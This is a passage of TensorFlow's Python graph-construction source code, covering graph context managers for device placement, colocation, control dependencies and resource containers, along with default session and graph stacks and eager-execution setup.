return self._name_stack
@tf_contextlib.contextmanager
def _colocate_with_for_gradient(self, op, gradient_uid,
ignore_existing=False):
with self.colocate_with(op, ignore_existing):
if gradient_uid is not None and self._control_flow_context is not None:
try:
self._control_flow_context.EnterGradientColocation(op, gradient_uid)
yield
finally:
self._control_flow_context.ExitGradientColocation(op, gradient_uid)
else:
yield
@tf_contextlib.contextmanager
def colocate_with(self, op, ignore_existing=False):
"""Returns a context manager that specifies an op to colocate with.
Note: this function is not for public use, only for internal libraries.
For example:
```python
a = tf.Variable([1.0])
with g.colocate_with(a):
b = tf.constant(1.0)
c = tf.add(a, b)
```
`b` and `c` will always be colocated with `a`, no matter where `a`
is eventually placed.
**NOTE** Using a colocation scope resets any existing device constraints.
If `op` is `None` then `ignore_existing` must be `True` and the new
scope resets all colocation and device constraints.
Args:
op: The op to colocate all created ops with, or `None`.
ignore_existing: If true, only applies colocation of this op within
the context, rather than applying all colocation properties
on the stack. If `op` is `None`, this value must be `True`.
Raises:
ValueError: if op is None but ignore_existing is False.
Yields:
A context manager that specifies the op with which to colocate
newly created ops.
"""
if op is None and not ignore_existing:
raise ValueError("Trying to reset colocation (op is None) but "
"ignore_existing is not True")
if op is not None and not isinstance(op, Operation):
# We always want to colocate with the reference op.
op = internal_convert_to_tensor_or_indexed_slices(op, as_ref=True).op
# By default, colocate_with resets the device function stack,
# since colocate_with is typically used in specific internal
# library functions where colocation is intended to be "stronger"
# than device functions.
#
# In the future, a caller may specify that device_functions win
# over colocation, in which case we can add support.
device_fn_tmp = self._device_function_stack
self._device_function_stack = []
if ignore_existing:
current_stack = self._colocation_stack
self._colocation_stack = []
if op is not None:
self._colocation_stack.append(op)
try:
yield
finally:
# Restore device function stack
self._device_function_stack = device_fn_tmp
if op is not None:
self._colocation_stack.pop()
# Reset the colocation stack if requested.
if ignore_existing:
self._colocation_stack = current_stack
@tf_contextlib.contextmanager
def device(self, device_name_or_function):
# pylint: disable=line-too-long
"""Returns a context manager that specifies the default device to use.
The `device_name_or_function` argument may either be a device name
string, a device function, or None:
* If it is a device name string, all operations constructed in
this context will be assigned to the device with that name, unless
overridden by a nested `device()` context.
* If it is a function, it will be treated as a function from
Operation objects to device name strings, and invoked each time
a new Operation is created. The Operation will be assigned to
the device with the returned name.
* If it is None, all `device()` invocations from the enclosing context
will be ignored.
For information about the valid syntax of device name strings, see
the documentation in
[`DeviceNameUtils`](https://www.tensorflow.org/code/tensorflow/core/util/device_name_utils.h).
For example:
```python
with g.device('/device:GPU:0'):
# All operations constructed in this context will be placed
# on GPU 0.
with g.device(None):
# All operations constructed in this context will have no
# assigned device.
# Defines a function from `Operation` to device string.
def matmul_on_gpu(n):
if n.type == "MatMul":
return "/device:GPU:0"
else:
return "/cpu:0"
with g.device(matmul_on_gpu):
# All operations of type "MatMul" constructed in this context
# will be placed on GPU 0; all other operations will be placed
# on CPU 0.
```
**N.B.** The device scope may be overridden by op wrappers or
other library code. For example, a variable assignment op
`v.assign()` must be colocated with the `tf.Variable` `v`, and
incompatible device scopes will be ignored.
Args:
device_name_or_function: The device name or function to use in
the context.
Yields:
A context manager that specifies the default device to use for newly
created ops.
"""
# pylint: enable=line-too-long
if (device_name_or_function is not None and
not callable(device_name_or_function)):
device_function = pydev.merge_device(device_name_or_function)
else:
device_function = device_name_or_function
try:
self._device_function_stack.append(device_function)
yield
finally:
self._device_function_stack.pop()
def _apply_device_functions(self, op):
"""Applies the current device function stack to the given operation."""
# Apply any device functions in reverse order, so that the most recently
# pushed function has the first chance to apply a device to the op.
# We apply here because the result can depend on the Operation's
# signature, which is computed in the Operation constructor.
for device_function in reversed(self._device_function_stack):
if device_function is None:
break
op._set_device(device_function(op)) # pylint: disable=protected-access
# pylint: disable=g-doc-return-or-yield
@tf_contextlib.contextmanager
def container(self, container_name):
"""Returns a context manager that specifies the resource container to use.
Stateful operations, such as variables and queues, can maintain their
states on devices so that they can be shared by multiple processes.
A resource container is a string name under which these stateful
operations are tracked. These resources can be released or cleared
with `tf.Session.reset()`.
For example:
```python
with g.container('experiment0'):
# All stateful Operations constructed in this context will be placed
# in resource container "experiment0".
v1 = tf.Variable([1.0])
v2 = tf.Variable([2.0])
with g.container("experiment1"):
# All stateful Operations constructed in this context will be
# placed in resource container "experiment1".
v3 = tf.Variable([3.0])
q1 = tf.FIFOQueue(10, tf.float32)
# All stateful Operations constructed in this context will be
# be created in the "experiment0".
v4 = tf.Variable([4.0])
q1 = tf.FIFOQueue(20, tf.float32)
with g.container(""):
# All stateful Operations constructed in this context will be
# be placed in the default resource container.
v5 = tf.Variable([5.0])
q3 = tf.FIFOQueue(30, tf.float32)
# Resets container "experiment0", after which the state of v1, v2, v4, q1
# will become undefined (such as uninitialized).
tf.Session.reset(target, ["experiment0"])
```
Args:
container_name: container name string.
Returns:
A context manager for defining resource containers for stateful ops,
yields the container name.
"""
original_container = self._container
try:
self._container = container_name
yield self._container
finally:
self._container = original_container
# pylint: enable=g-doc-return-or-yield
class _ControlDependenciesController(object):
"""Context manager for `control_dependencies()`."""
def __init__(self, graph, control_inputs):
"""Create a new `_ControlDependenciesController`.
A `_ControlDependenciesController` is the context manager for
`with tf.control_dependencies()` blocks. These normally nest,
as described in the documentation for `control_dependencies()`.
The `control_inputs` argument list control dependencies that must be
added to the current set of control dependencies. Because of
uniquification the set can be empty even if the caller passed a list of
ops. The special value `None` indicates that we want to start a new
empty set of control dependencies instead of extending the current set.
In that case we also clear the current control flow context, which is an
additional mechanism to add control dependencies.
Args:
graph: The graph that this controller is managing.
control_inputs: List of ops to use as control inputs in addition
to the current control dependencies. None to indicate that
the dependencies should be cleared.
"""
self._graph = graph
if control_inputs is None:
self._control_inputs_val = []
self._new_stack = True
else:
self._control_inputs_val = control_inputs
self._new_stack = False
self._seen_nodes = set()
self._old_stack = None
self._old_control_flow_context = None
# pylint: disable=protected-access
def __enter__(self):
if self._new_stack:
# Clear the control_dependencies graph.
self._old_stack = self._graph._control_dependencies_stack
self._graph._control_dependencies_stack = []
# Clear the control_flow_context too.
self._old_control_flow_context = self._graph._get_control_flow_context()
self._graph._set_control_flow_context(None)
self._graph._push_control_dependencies_controller(self)
def __exit__(self, unused_type, unused_value, unused_traceback):
self._graph._pop_control_dependencies_controller(self)
if self._new_stack:
self._graph._control_dependencies_stack = self._old_stack
self._graph._set_control_flow_context(self._old_control_flow_context)
# pylint: enable=protected-access
@property
def control_inputs(self):
return self._control_inputs_val
def add_op(self, op):
self._seen_nodes.add(op)
def op_in_group(self, op):
return op in self._seen_nodes
def _push_control_dependencies_controller(self, controller):
self._control_dependencies_stack.append(controller)
def _pop_control_dependencies_controller(self, controller):
assert self._control_dependencies_stack[-1] is controller
self._control_dependencies_stack.pop()
def _current_control_dependencies(self):
ret = set()
for controller in self._control_dependencies_stack:
for op in controller.control_inputs:
ret.add(op)
return ret
def _control_dependencies_for_inputs(self, input_ops):
"""For an op that takes `input_ops` as inputs, compute control inputs.
The returned control dependencies should yield an execution that
is equivalent to adding all control inputs in
self._control_dependencies_stack to a newly created op. However,
this function attempts to prune the returned control dependencies
by observing that nodes created within the same `with
control_dependencies(...):` block may have data dependencies that make
the explicit approach redundant.
Args:
input_ops: The data input ops for an op to be created.
Returns:
A list of control inputs for the op to be created.
"""
ret = []
for controller in self._control_dependencies_stack:
# If any of the input_ops already depends on the inputs from controller,
# we say that the new op is dominated (by that input), and we therefore
# do not need to add control dependencies for this controller's inputs.
dominated = False
for op in input_ops:
if controller.op_in_group(op):
dominated = True
break
if not dominated:
# Don't add a control input if we already have a data dependency on i.
# NOTE(mrry): We do not currently track transitive data dependencies,
# so we may add redundant control inputs.
ret.extend([c for c in controller.control_inputs if c not in input_ops])
return ret
def _record_op_seen_by_control_dependencies(self, op):
"""Record that the given op depends on all registered control dependencies.
Args:
op: An Operation.
"""
for controller in self._control_dependencies_stack:
controller.add_op(op)
def control_dependencies(self, control_inputs):
"""Returns a context manager that specifies control dependencies.
Use with the `with` keyword to specify that all operations constructed
within the context should have control dependencies on
`control_inputs`. For example:
```python
with g.control_dependencies([a, b, c]):
# `d` and `e` will only run after `a`, `b`, and `c` have executed.
d = ...
e = ...
```
Multiple calls to `control_dependencies()` can be nested, and in
that case a new `Operation` will have control dependencies on the union
of `control_inputs` from all active contexts.
```python
with g.control_dependencies([a, b]):
# Ops constructed here run after `a` and `b`.
with g.control_dependencies([c, d]):
# Ops constructed here run after `a`, `b`, `c`, and `d`.
```
You can pass None to clear the control dependencies:
```python
with g.control_dependencies([a, b]):
# Ops constructed here run after `a` and `b`.
with g.control_dependencies(None):
# Ops constructed here run normally, not waiting for either `a` or `b`.
with g.control_dependencies([c, d]):
# Ops constructed here run after `c` and `d`, also not waiting
# for either `a` or `b`.
```
*N.B.* The control dependencies context applies *only* to ops that
are constructed within the context. Merely using an op or tensor
in the context does not add a control dependency. The following
example illustrates this point:
```python
# WRONG
def my_func(pred, tensor):
t = tf.matmul(tensor, tensor)
with tf.control_dependencies([pred]):
# The matmul op is created outside the context, so no control
# dependency will be added.
return t
# RIGHT
def my_func(pred, tensor):
with tf.control_dependencies([pred]):
# The matmul op is created in the context, so a control dependency
# will be added.
return tf.matmul(tensor, tensor)
```
Also note that though execution of ops created under this scope will trigger
execution of the dependencies, the ops created under this scope might still
be pruned from a normal tensorflow graph. For example, in the following
snippet of code the dependencies are never executed:
```python
loss = model.loss()
with tf.control_dependencies(dependencies):
loss = loss + tf.constant(1) # note: dependencies ignored in the
# backward pass
return tf.gradients(loss, model.variables)
```
This is because evaluating the gradient graph does not require evaluating
the constant(1) op created in the forward pass.
Args:
control_inputs: A list of `Operation` or `Tensor` objects which
must be executed or computed before running the operations
defined in the context. Can also be `None` to clear the control
dependencies.
Returns:
A context manager that specifies control dependencies for all
operations constructed within the context.
Raises:
TypeError: If `control_inputs` is not a list of `Operation` or
`Tensor` objects.
"""
if control_inputs is None:
return self._ControlDependenciesController(self, None)
# First convert the inputs to ops, and deduplicate them.
# NOTE(mrry): Other than deduplication, we do not currently track direct
# or indirect dependencies between control_inputs, which may result in
# redundant control inputs.
control_ops = []
current = self._current_control_dependencies()
for c in control_inputs:
if isinstance(c, IndexedSlices):
c = c.op
c = self.as_graph_element(c)
if isinstance(c, Tensor):
c = c.op
elif not isinstance(c, Operation):
raise TypeError("Control input must be Operation or Tensor: %s" % c)
if c not in current:
control_ops.append(c)
current.add(c)
return self._ControlDependenciesController(self, control_ops)
# pylint: disable=g-doc-return-or-yield
@tf_contextlib.contextmanager
def _attr_scope(self, attr_map):
"""EXPERIMENTAL: A context manager for setting attributes on operators.
This context manager can be used to add additional
attributes to operators within the scope of the context.
For example:
with ops.Graph().as_default() as g:
f_1 = Foo() # No extra attributes
with g._attr_scope({"_a": tf.attr_value_pb2.AttrValue(b=False)}):
f_2 = Foo() # Additional attribute _a=False
with g._attr_scope({"_a": tf.attr_value_pb2.AttrValue(b=True)}):
f_3 = Foo() # Additional attribute _a=False
with g._attr_scope({"_a": None}):
f_4 = Foo() # No additional attributes.
Args:
attr_map: A dictionary mapping attr name strings to
AttrValue protocol buffers or None.
Returns:
A context manager that sets the kernel label to be used for one or more
ops created in that context.
Raises:
TypeError: If attr_map is not a dictionary mapping
strings to AttrValue protobufs.
"""
if not isinstance(attr_map, dict):
raise TypeError("attr_map must be a dictionary mapping "
"strings to AttrValue protocol buffers")
# The saved_attrs dictionary stores any currently-set labels that
# will be overridden by this context manager.
saved_attrs = {}
# Install the given attribute
for name, attr in attr_map.items():
if not (isinstance(name, six.string_types) and
(isinstance(attr, (type(None), attr_value_pb2.AttrValue)) or
callable(attr))):
raise TypeError("attr_map must be a dictionary mapping "
"strings to AttrValue protocol buffers or "
"callables that emit AttrValue protocol buffers")
try:
saved_attrs[name] = self._attr_scope_map[name]
except KeyError:
pass
if attr is None:
del self._attr_scope_map[name]
else:
self._attr_scope_map[name] = attr
try:
yield # The code within the context runs here.
finally:
# Remove the attributes set for this context, and restore any saved
# attributes.
for name, attr in attr_map.items():
try:
self._attr_scope_map[name] = saved_attrs[name]
except KeyError:
del self._attr_scope_map[name]
# pylint: enable=g-doc-return-or-yield
# pylint: disable=g-doc-return-or-yield
@tf_contextlib.contextmanager
def _kernel_label_map(self, op_to_kernel_label_map):
"""EXPERIMENTAL: A context manager for setting kernel labels.
This context manager can be used to select particular
implementations of kernels within the scope of the context.
For example:
with ops.Graph().as_default() as g:
f_1 = Foo() # Uses the default registered kernel for the Foo op.
with g.kernel_label_map({"Foo": "v_2"}):
f_2 = Foo() # Uses the registered kernel with label "v_2"
# for the Foo op.
with g.kernel_label_map({"Foo": "v_3"}):
f_3 = Foo() # Uses the registered kernel with label "v_3"
# for the Foo op.
with g.kernel_label_map({"Foo": ""}):
f_4 = Foo() # Uses the default registered kernel
# for the Foo op.
Args:
op_to_kernel_label_map: A dictionary mapping op type strings to
kernel label strings.
Returns:
A context manager that sets the kernel label to be used for one or more
ops created in that context.
Raises:
TypeError: If op_to_kernel_label_map is not a dictionary mapping
strings to strings.
"""
if not isinstance(op_to_kernel_label_map, dict):
raise TypeError("op_to_kernel_label_map must be a dictionary mapping "
"strings to strings")
# The saved_labels dictionary stores any currently-set labels that
# will be overridden by this context manager.
saved_labels = {}
# Install the given label
for op_type, label in op_to_kernel_label_map.items():
if not (isinstance(op_type, six.string_types) and
isinstance(label, six.string_types)):
raise TypeError("op_to_kernel_label_map must be a dictionary mapping "
"strings to strings")
try:
saved_labels[op_type] = self._op_to_kernel_label_map[op_type]
except KeyError:
pass
self._op_to_kernel_label_map[op_type] = label
try:
yield # The code within the context runs here.
finally:
# Remove the labels set for this context, and restore any saved labels.
for op_type, label in op_to_kernel_label_map.items():
try:
self._op_to_kernel_label_map[op_type] = saved_labels[op_type]
except KeyError:
del self._op_to_kernel_label_map[op_type]
# pylint: enable=g-doc-return-or-yield
# pylint: disable=g-doc-return-or-yield
@tf_contextlib.contextmanager
def gradient_override_map(self, op_type_map):
"""EXPERIMENTAL: A context manager for overriding gradient functions.
This context manager can be used to override the gradient function
that will be used for ops within the scope of the context.
For example:
```python
@tf.RegisterGradient("CustomSquare")
def _custom_square_grad(op, grad):
# ...
with tf.Graph().as_default() as g:
c = tf.constant(5.0)
s_1 = tf.square(c) # Uses the default gradient for tf.square.
with g.gradient_override_map({"Square": "CustomSquare"}):
s_2 = tf.square(s_2) # Uses _custom_square_grad to compute the
# gradient of s_2.
```
Args:
op_type_map: A dictionary mapping op type strings to alternative op
type strings.
Returns:
A context manager that sets the alternative op type to be used for one
or more ops created in that context.
Raises:
TypeError: If `op_type_map` is not a dictionary mapping strings to
strings.
"""
if not isinstance(op_type_map, dict):
raise TypeError("op_type_map must be a dictionary mapping "
"strings to strings")
# The saved_mappings dictionary stores any currently-set mappings that
# will be overridden by this context manager.
saved_mappings = {}
# Install the given label
for op_type, mapped_op_type in op_type_map.items():
if not (isinstance(op_type, six.string_types) and
isinstance(mapped_op_type, six.string_types)):
raise TypeError("op_type_map must be a dictionary mapping "
"strings to strings")
try:
saved_mappings[op_type] = self._gradient_override_map[op_type]
except KeyError:
pass
self._gradient_override_map[op_type] = mapped_op_type
try:
yield # The code within the context runs here.
finally:
# Remove the labels set for this context, and restore any saved labels.
for op_type, mapped_op_type in op_type_map.items():
try:
self._gradient_override_map[op_type] = saved_mappings[op_type]
except KeyError:
del self._gradient_override_map[op_type]
# pylint: enable=g-doc-return-or-yield
def prevent_feeding(self, tensor):
"""Marks the given `tensor` as unfeedable in this graph."""
self._unfeedable_tensors.add(tensor)
def is_feedable(self, tensor):
"""Returns `True` if and only if `tensor` is feedable."""
return tensor not in self._unfeedable_tensors
def prevent_fetching(self, op):
"""Marks the given `op` as unfetchable in this graph."""
self._unfetchable_ops.add(op)
def is_fetchable(self, tensor_or_op):
"""Returns `True` if and only if `tensor_or_op` is fetchable."""
if isinstance(tensor_or_op, Tensor):
return tensor_or_op.op not in self._unfetchable_ops
else:
return tensor_or_op not in self._unfetchable_ops
def switch_to_thread_local(self):
"""Make device, colocation and dependencies stacks thread-local.
Device, colocation and dependencies stacks are not thread-local be default.
If multiple threads access them, then the state is shared. This means that
one thread may affect the behavior of another thread.
After this method is called, the stacks become thread-local. If multiple
threads access them, then the state is not shared. Each thread uses its own
value; a thread doesn't affect other threads by mutating such a stack.
The initial value for every thread's stack is set to the current value
of the stack when `switch_to_thread_local()` was first called.
"""
if not self._stack_state_is_thread_local:
self._stack_state_is_thread_local = True
@property
def _device_function_stack(self):
if self._stack_state_is_thread_local:
# This may be called from a thread where device_function_stack doesn't yet
# exist.
if not hasattr(self._thread_local, "_device_function_stack"):
self._thread_local._device_function_stack = (
self._graph_device_function_stack[:])
return self._thread_local._device_function_stack
else:
return self._graph_device_function_stack
@_device_function_stack.setter
def _device_function_stack(self, device_function_stack):
if self._stack_state_is_thread_local:
self._thread_local._device_function_stack = device_function_stack
else:
self._graph_device_function_stack = device_function_stack
@property
def _colocation_stack(self):
if self._stack_state_is_thread_local:
# This may be called from a thread where colocation_stack doesn't yet
# exist.
if not hasattr(self._thread_local, "_colocation_stack"):
self._thread_local._colocation_stack = self._graph_colocation_stack[:]
return self._thread_local._colocation_stack
else:
return self._graph_colocation_stack
@_colocation_stack.setter
def _colocation_stack(self, colocation_stack):
if self._stack_state_is_thread_local:
self._thread_local._colocation_stack = colocation_stack
else:
self._graph_colocation_stack = colocation_stack
@property
def _control_dependencies_stack(self):
if self._stack_state_is_thread_local:
# This may be called from a thread where control_dependencies_stack
# doesn't yet exist.
if not hasattr(self._thread_local, "_control_dependencies_stack"):
self._thread_local._control_dependencies_stack = (
self._graph_control_dependencies_stack[:])
return self._thread_local._control_dependencies_stack
else:
return self._graph_control_dependencies_stack
@_control_dependencies_stack.setter
def _control_dependencies_stack(self, control_dependencies):
if self._stack_state_is_thread_local:
self._thread_local._control_dependencies_stack = control_dependencies
else:
self._graph_control_dependencies_stack = control_dependencies
# TODO(agarwal): currently device directives in an outer eager scope will not
# apply to inner graph mode code. Fix that.
@tf_export("device")
def device(device_name_or_function):
"""Wrapper for `Graph.device()` using the default graph.
See
@{tf.Graph.device}
for more details.
Args:
device_name_or_function: The device name or function to use in
the context.
Returns:
A context manager that specifies the default device to use for newly
created ops.
Raises:
RuntimeError: If eager execution is enabled and a function is passed in.
"""
if context.executing_eagerly():
# TODO(agarwal): support device functions in EAGER mode.
if callable(device_name_or_function):
raise RuntimeError(
"tf.device does not support functions when eager execution "
"is enabled.")
return context.device(device_name_or_function)
else:
return get_default_graph().device(device_name_or_function)
@tf_export("container")
def container(container_name):
"""Wrapper for `Graph.container()` using the default graph.
Args:
container_name: The container string to use in the context.
Returns:
A context manager that specifies the default container to use for newly
created stateful ops.
"""
return get_default_graph().container(container_name)
def _colocate_with_for_gradient(op, gradient_uid, ignore_existing=False):
if context.executing_eagerly():
if op is not None:
return device(op.device)
else:
return _NullContextmanager()
else:
default_graph = get_default_graph()
if isinstance(op, EagerTensor):
if default_graph.building_function:
return default_graph.device(op.device)
else:
raise ValueError("Encountered an Eager-defined Tensor during graph "
"construction, but a function was not being built.")
return default_graph._colocate_with_for_gradient(
op, gradient_uid=gradient_uid, ignore_existing=ignore_existing)
@tf_export("colocate_with")
def colocate_with(op, ignore_existing=False):
return _colocate_with_for_gradient(op, None, ignore_existing=ignore_existing)
@tf_export("control_dependencies")
def control_dependencies(control_inputs):
"""Wrapper for `Graph.control_dependencies()` using the default graph.
See @{tf.Graph.control_dependencies}
for more details.
When eager execution is enabled, any callable object in the `control_inputs`
list will be called.
Args:
control_inputs: A list of `Operation` or `Tensor` objects which
must be executed or computed before running the operations
defined in the context. Can also be `None` to clear the control
dependencies. If eager execution is enabled, any callable object in the
`control_inputs` list will be called.
Returns:
A context manager that specifies control dependencies for all
operations constructed within the context.
"""
if context.executing_eagerly():
if control_inputs:
# Excute any pending callables.
for control in control_inputs:
if callable(control):
control()
return _NullContextmanager()
else:
return get_default_graph().control_dependencies(control_inputs)
class _DefaultStack(threading.local):
"""A thread-local stack of objects for providing implicit defaults."""
def __init__(self):
super(_DefaultStack, self).__init__()
self._enforce_nesting = True
self.stack = []
def get_default(self):
return self.stack[-1] if len(self.stack) >= 1 else None
def reset(self):
self.stack = []
def is_cleared(self):
return not self.stack
@property
def enforce_nesting(self):
return self._enforce_nesting
@enforce_nesting.setter
def enforce_nesting(self, value):
self._enforce_nesting = value
@tf_contextlib.contextmanager
def get_controller(self, default):
"""A context manager for manipulating a default stack."""
try:
self.stack.append(default)
yield default
finally:
# stack may be empty if reset() was called
if self.stack:
if self._enforce_nesting:
if self.stack[-1] is not default:
raise AssertionError(
"Nesting violated for default stack of %s objects" %
type(default))
self.stack.pop()
else:
self.stack.remove(default)
_default_session_stack = _DefaultStack() # pylint: disable=protected-access
def default_session(session):
"""Python "with" handler for defining a default session.
This function provides a means of registering a session for handling
Tensor.eval() and Operation.run() calls. It is primarily intended for use
by session.Session, but can be used with any object that implements
the Session.run() interface.
Use with the "with" keyword to specify that Tensor.eval() and Operation.run()
invocations within the scope of a block should be executed by a particular
session.
The default session applies to the current thread only, so it is always
possible to inspect the call stack and determine the scope of a default
session. If you create a new thread, and wish to use the default session
in that thread, you must explicitly add a "with ops.default_session(sess):"
block in that thread's function.
Example:
The following code examples are equivalent:
# 1. Using the Session object directly:
sess = ...
c = tf.constant(5.0)
sess.run(c)
# 2. Using default_session():
sess = ...
with ops.default_session(sess):
c = tf.constant(5.0)
result = c.eval()
# 3. Overriding default_session():
sess = ...
with ops.default_session(sess):
c = tf.constant(5.0)
with ops.default_session(...):
c.eval(session=sess)
Args:
session: The session to be installed as the default session.
Returns:
A context manager for the default session.
"""
return _default_session_stack.get_controller(session)
@tf_export("get_default_session")
def get_default_session():
"""Returns the default session for the current thread.
The returned `Session` will be the innermost session on which a
`Session` or `Session.as_default()` context has been entered.
NOTE: The default session is a property of the current thread. If you
create a new thread, and wish to use the default session in that
thread, you must explicitly add a `with sess.as_default():` in that
thread's function.
Returns:
The default `Session` being used in the current thread.
"""
return _default_session_stack.get_default()
def _eval_using_default_session(tensors, feed_dict, graph, session=None):
"""Uses the default session to evaluate one or more tensors.
Args:
tensors: A single Tensor, or a list of Tensor objects.
feed_dict: A dictionary that maps Tensor objects (or tensor names) to lists,
numpy ndarrays, TensorProtos, or strings.
graph: The graph in which the tensors are defined.
session: (Optional) A different session to use to evaluate "tensors".
Returns:
Either a single numpy ndarray if "tensors" is a single tensor; or a list
of numpy ndarrays that each correspond to the respective element in
"tensors".
Raises:
ValueError: If no default session is available; the default session
does not have "graph" as its graph; or if "session" is specified,
and it does not have "graph" as its graph.
"""
if session is None:
session = get_default_session()
if session is None:
raise ValueError("Cannot evaluate tensor using `eval()`: No default "
"session is registered. Use `with "
"sess.as_default()` or pass an explicit session to "
"`eval(session=sess)`")
if session.graph is not graph:
raise ValueError("Cannot use the default session to evaluate tensor: "
"the tensor's graph is different from the session's "
"graph. Pass an explicit session to "
"`eval(session=sess)`.")
else:
if session.graph is not graph:
raise ValueError("Cannot use the given session to evaluate tensor: "
"the tensor's graph is different from the session's "
"graph.")
return session.run(tensors, feed_dict)
def _run_using_default_session(operation, feed_dict, graph, session=None):
"""Uses the default session to run "operation".
Args:
operation: The Operation to be run.
feed_dict: A dictionary that maps Tensor objects (or tensor names) to lists,
numpy ndarrays, TensorProtos, or strings.
graph: The graph in which "operation" is defined.
session: (Optional) A different session to use to run "operation".
Raises:
ValueError: If no default session is available; the default session
does not have "graph" as its graph; or if "session" is specified,
and it does not have "graph" as its graph.
"""
if session is None:
session = get_default_session()
if session is None:
raise ValueError("Cannot execute operation using `run()`: No default "
"session is registered. Use `with "
"sess.as_default():` or pass an explicit session to "
"`run(session=sess)`")
if session.graph is not graph:
raise ValueError("Cannot use the default session to execute operation: "
"the operation's graph is different from the "
"session's graph. Pass an explicit session to "
"run(session=sess).")
else:
if session.graph is not graph:
raise ValueError("Cannot use the given session to execute operation: "
"the operation's graph is different from the session's "
"graph.")
session.run(operation, feed_dict)
class _DefaultGraphStack(_DefaultStack): # pylint: disable=protected-access
"""A thread-local stack of objects for providing an implicit default graph."""
def __init__(self):
super(_DefaultGraphStack, self).__init__()
self._global_default_graph = None
def get_default(self):
"""Override that returns a global default if the stack is empty."""
ret = super(_DefaultGraphStack, self).get_default()
if ret is None:
ret = self._GetGlobalDefaultGraph()
return ret
def _GetGlobalDefaultGraph(self):
if self._global_default_graph is None:
# TODO(mrry): Perhaps log that the default graph is being used, or set
# provide some other feedback to prevent confusion when a mixture of
# the global default graph and an explicit graph are combined in the
# same process.
self._global_default_graph = Graph()
return self._global_default_graph
def reset(self):
super(_DefaultGraphStack, self).reset()
self._global_default_graph = None
@tf_contextlib.contextmanager
def get_controller(self, default):
try:
context.context().context_switches.push(
default.building_function, default.as_default)
with super(_DefaultGraphStack, self).get_controller(
default) as g, context.graph_mode():
yield g
finally:
context.context().context_switches.pop()
_default_graph_stack = _DefaultGraphStack()
# pylint: disable=g-doc-return-or-yield,line-too-long
@tf_contextlib.contextmanager
def init_scope():
"""A context manager that lifts ops out of control-flow scopes and function-building graphs.
There is often a need to lift variable initialization ops out of control-flow
scopes, function-building graphs, and gradient tapes. Entering an
`init_scope` is a mechanism for satisfying these desiderata. In particular,
entering an `init_scope` has three effects:
(1) All control dependencies are cleared the moment the scope is entered;
this is equivalent to entering the context manager returned from
`control_dependencies(None)`, which has the side-effect of exiting
control-flow scopes like `tf.cond` and `tf.while_loop`.
(2) All operations that are created while the scope is active are lifted
into the lowest context on the `context_stack` that is not building a
graph function. Here, a context is defined as either a graph or an eager
context. Every context switch, i.e., every installation of a graph as
the default graph and every switch into eager mode, is logged in a
thread-local stack called `context_switches`; the log entry for a
context switch is popped from the stack when the context is exited.
Entering an `init_scope` is equivalent to crawling up
`context_switches`, finding the first context that is not building a
graph function, and entering it. A caveat is that if graph mode is
enabled but the default graph stack is empty, then entering an
`init_scope` will simply install a fresh graph as the default one.
(3) The gradient tape is paused while the scope is active.
"""
# pylint: enable=g-doc-return-or-yield,line-too-long
if context.executing_eagerly():
# Fastpath.
with tape.stop_recording():
yield
else:
# Retrieve the active name scope: entering an `init_scope` preserves
# the name scope of the current context.
default_graph = get_default_graph()
scope = default_graph.get_name_scope()
if scope and scope[-1] != '/':
# Names that end with trailing slashes are treated by `name_scope` as
# absolute.
scope = scope + '/'
inner_device_stack = default_graph._device_function_stack # pylint: disable=protected-access
outer_context = None
if not _default_graph_stack.stack:
# If the default graph stack is empty, then we cannot be building a
# function. Install the global graph (which, in this case, is also the
# default graph) as the outer context.
if default_graph.building_function:
raise RuntimeError("The global graph is building a function.")
outer_context = default_graph.as_default
else:
# Find a context that is not building a function.
for stack_entry in reversed(context.context().context_switches.stack):
if not stack_entry.is_building_function:
outer_context = stack_entry.enter_context_fn
break
if outer_context is None:
# As a last resort, obtain the global default graph; this graph doesn't
# necessarily live on the graph stack (and hence it doesn't necessarily
# live on the context stack), but it is stored in the graph stack's
# encapsulating object.
outer_context = _default_graph_stack._GetGlobalDefaultGraph().as_default # pylint: disable=protected-access
if outer_context is None:
# Sanity check; this shouldn't be triggered.
raise RuntimeError("All graphs are building functions, and no "
"eager context was previously active.")
outer_graph = None
outer_device_stack = None
try:
with outer_context(), name_scope(scope), control_dependencies(
None), tape.stop_recording():
if not context.executing_eagerly():
# The device stack is preserved when lifting into a graph. Eager
# execution doesn't implement device stacks and in particular it
# doesn't support device functions, so in general it's not possible
# to do the same when lifting into the eager context.
outer_graph = get_default_graph()
outer_device_stack = outer_graph._device_function_stack # pylint: disable=protected-access
outer_graph._device_function_stack = inner_device_stack # pylint: disable=protected-access
yield
finally:
if outer_graph is not None:
outer_graph._device_function_stack = outer_device_stack # pylint: disable=protected-access
@tf_export("enable_eager_execution")
def enable_eager_execution(config=None, device_policy=None,
execution_mode=None):
"""Enables eager execution for the lifetime of this program.
Eager execution provides an imperative interface to TensorFlow. With eager
execution enabled, TensorFlow functions execute operations immediately (as
opposed to adding to a graph to be executed later in a @{tf.Session}) and
return concrete values (as opposed to symbolic references to a node in a
computational graph).
For example:
```python
tf.enable_eager_execution()
# After eager execution is enabled, operations are executed as they are
# defined and Tensor objects hold concrete values, which can be accessed as
# numpy.ndarray`s through the numpy() method.
assert tf.multiply(6, 7).numpy() == 42
```
Eager execution cannot be enabled after TensorFlow APIs have been used to
create or execute graphs. It is typically recommended to invoke this function
at program startup and not in a library (as most libraries should be usable
both with and without eager execution).
Args:
config: (Optional.) A @{tf.ConfigProto} to use to configure the environment
in which operations are executed. Note that @{tf.ConfigProto} is also
used to configure graph execution (via @{tf.Session}) and many options
within `tf.ConfigProto` are not implemented (or are irrelevant) when
eager execution is enabled.
device_policy: (Optional.) Policy controlling how operations requiring
inputs on a specific device (e.g., a GPU 0) handle inputs on a different
device (e.g. GPU 1 or CPU). When set to None, an appropriate value will be
picked automatically. The value picked may change between TensorFlow
releases.
Valid values:
- tf.contrib.eager.DEVICE_PLACEMENT_EXPLICIT: raises an error if the
placement is not correct.
- tf.contrib.eager.DEVICE_PLACEMENT_WARN: copies the tensors which are not
on the right device but logs a warning.
- tf.contrib.eager.DEVICE_PLACEMENT_SILENT: silently copies the tensors.
Note that this may hide performance problems as there is no notification
provided when operations are blocked on the tensor being copied between
devices.
- tf.contrib.eager.DEVICE_PLACEMENT_SILENT_FOR_INT32: silently copies
int32 tensors, raising errors on the other ones.
execution_mode: (Optional.) Policy controlling how operations dispatched are
actually executed. When set to None, an appropriate value will be picked
automatically. The value picked may change between TensorFlow releases.
Valid values:
- tf.contrib.eager.SYNC: executes each operation synchronously.
- tf.contrib.eager.ASYNC: executes each operation asynchronously. These
operations may return "non-ready" handles.
Raises:
